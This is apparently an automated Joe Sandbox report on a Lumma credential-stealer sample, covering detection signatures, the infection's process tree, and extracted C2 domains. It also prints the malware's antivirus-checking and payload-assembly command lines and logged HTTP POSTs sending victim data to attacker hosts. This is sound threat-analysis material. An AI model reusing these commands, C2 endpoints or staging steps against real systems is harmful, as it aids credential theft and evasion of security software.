Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CLaYpUL3zw.exe

Overview

General Information

Sample name:CLaYpUL3zw.exe
renamed because original name is a hash value
Original sample name:ccf904b9afa2515f1120932e4bd1f148.exe
Analysis ID:1581578
MD5:ccf904b9afa2515f1120932e4bd1f148
SHA1:b7e131f06fd949ed071c745111d5589cd3be7ef9
SHA256:06fc3e8f951fa3855d4056ea043a8de4d24b78df32f4423402305aa516fd56ff
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Leaks process information
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • CLaYpUL3zw.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\CLaYpUL3zw.exe" MD5: CCF904B9AFA2515F1120932E4BD1F148)
    • PasoCattle.exe (PID: 408 cmdline: "C:\Users\user\AppData\Local\Temp\PasoCattle.exe" MD5: A3E9A86D6EDE94C3C71D1F7EEA537766)
      • cmd.exe (PID: 1240 cmdline: "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5136 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 3836 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 1680 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 6020 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 4568 cmdline: cmd /c md 768400 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • extrac32.exe (PID: 2148 cmdline: extrac32 /Y /E Reflect MD5: 9472AAB6390E4F1431BAA912FCFF9707)
        • findstr.exe (PID: 5912 cmdline: findstr /V "cocks" Articles MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 1220 cmdline: cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Climb.com (PID: 5660 cmdline: Climb.com V MD5: 62D09F076E6E0240548C2F837536A46A)
        • choice.exe (PID: 6388 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
    • Set-up.exe (PID: 4352 cmdline: "C:\Users\user\AppData\Local\Temp\Set-up.exe" MD5: 2A99036C44C996CEDEB2042D389FE23C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["hummskitnj.buzz", "scentniej.buzz", "appliacnesot.buzz", "rebuildeso.buzz", "inherineau.buzz", "spuriotis.click", "prisonyfork.buzz", "cashfuzysao.buzz", "screwamusresz.buzz"], "Build id": "5FwhVM--lll"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000E.00000003.3296131318.000000000457B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000E.00000003.3296328079.000000000457B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: Climb.com PID: 5660JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
              Process Memory Space: Climb.com PID: 5660JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 2 entries
                SourceRuleDescriptionAuthorStrings
                0.2.CLaYpUL3zw.exe.5d0000.0.unpackMALWARE_Win_DLInjector04Detects downloader / injectorditekSHen
                • 0x78d71d:$s1: Runner
                • 0x78d882:$s3: RunOnStartup
                • 0x78d731:$a1: Antis
                • 0x78d75e:$a2: antiVM
                • 0x78d765:$a3: antiSandbox
                • 0x78d771:$a4: antiDebug
                • 0x78d77b:$a5: antiEmulator
                • 0x78d788:$a6: enablePersistence
                • 0x78d79a:$a7: enableFakeError
                • 0x78d8ab:$a8: DetectVirtualMachine
                • 0x78d8d0:$a9: DetectSandboxie
                • 0x78d8fb:$a10: DetectDebugger
                • 0x78d90a:$a11: CheckEmulator

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1240, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6020, ProcessName: findstr.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:29:52.671566+010020283713Unknown Traffic192.168.2.549774172.67.128.184443TCP
                2024-12-28T09:29:54.952954+010020283713Unknown Traffic192.168.2.549781172.67.128.184443TCP
                2024-12-28T09:29:57.475683+010020283713Unknown Traffic192.168.2.549787172.67.128.184443TCP
                2024-12-28T09:30:00.115076+010020283713Unknown Traffic192.168.2.549794172.67.128.184443TCP
                2024-12-28T09:30:02.418306+010020283713Unknown Traffic192.168.2.549800172.67.128.184443TCP
                2024-12-28T09:30:05.088798+010020283713Unknown Traffic192.168.2.549810172.67.128.184443TCP
                2024-12-28T09:30:08.149158+010020283713Unknown Traffic192.168.2.549818172.67.128.184443TCP
                2024-12-28T09:30:13.613991+010020283713Unknown Traffic192.168.2.549830172.67.128.184443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:29:53.732328+010020546531A Network Trojan was detected192.168.2.549774172.67.128.184443TCP
                2024-12-28T09:29:55.726467+010020546531A Network Trojan was detected192.168.2.549781172.67.128.184443TCP
                2024-12-28T09:30:14.478972+010020546531A Network Trojan was detected192.168.2.549830172.67.128.184443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:29:53.732328+010020498361A Network Trojan was detected192.168.2.549774172.67.128.184443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:29:55.726467+010020498121A Network Trojan was detected192.168.2.549781172.67.128.184443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:29:58.431227+010020480941Malware Command and Control Activity Detected192.168.2.549787172.67.128.184443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: CLaYpUL3zw.exeAvira: detected
                Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lse=IAvira URL Cloud: Label: malware
                Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=06Avira URL Cloud: Label: malware
                Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["hummskitnj.buzz", "scentniej.buzz", "appliacnesot.buzz", "rebuildeso.buzz", "inherineau.buzz", "spuriotis.click", "prisonyfork.buzz", "cashfuzysao.buzz", "screwamusresz.buzz"], "Build id": "5FwhVM--lll"}
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeReversingLabs: Detection: 69%
                Source: CLaYpUL3zw.exeVirustotal: Detection: 52%Perma Link
                Source: CLaYpUL3zw.exeReversingLabs: Detection: 50%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                Source: CLaYpUL3zw.exeJoe Sandbox ML: detected
                Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
                Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
                Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
                Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString decryptor: inherineau.buzz
                Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString decryptor: scentniej.buzz
                Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
                Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
                Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString decryptor: spuriotis.click
                Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 0000000E.00000003.2455554310.0000000001C24000.00000004.00000020.00020000.00000000.sdmpString decryptor: 5FwhVM--lll
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_9bc950d3-3
                Source: CLaYpUL3zw.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49781 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49787 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49794 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49800 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49810 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49818 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49830 version: TLS 1.2
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_00406301 FindFirstFileW,FindClose,2_2_00406301
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0055DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_0055DC54
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0056A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_0056A087
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0056A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_0056A1E2
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0055E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,14_2_0055E472
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0056A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,14_2_0056A570
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0052C622 FindFirstFileExW,14_2_0052C622
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_005666DC FindFirstFileW,FindNextFileW,FindClose,14_2_005666DC
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00567333 FindFirstFileW,FindClose,14_2_00567333
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_005673D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,14_2_005673D4
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0055D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_0055D921
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\768400Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\768400\Jump to behavior

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49787 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49774 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49774 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49830 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49781 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49781 -> 172.67.128.184:443
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: spuriotis.click
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                Source: global trafficHTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: */*Content-Type: application/jsonContent-Length: 514003Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 37 35 34 39 38 30 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c
                Source: global trafficHTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: */*
                Source: global trafficHTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
                Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49781 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49774 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49794 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49787 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49800 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49830 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49810 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49818 -> 172.67.128.184:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: spuriotis.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: spuriotis.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4940WYF3RM3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12791Host: spuriotis.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EDJ2WBQBJ7BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15033Host: spuriotis.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FL5CLJC2ZZYV0FNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20547Host: spuriotis.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PGRU0P1V1YYIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1211Host: spuriotis.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LZT6ZN09IOYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 573710Host: spuriotis.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: spuriotis.click
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
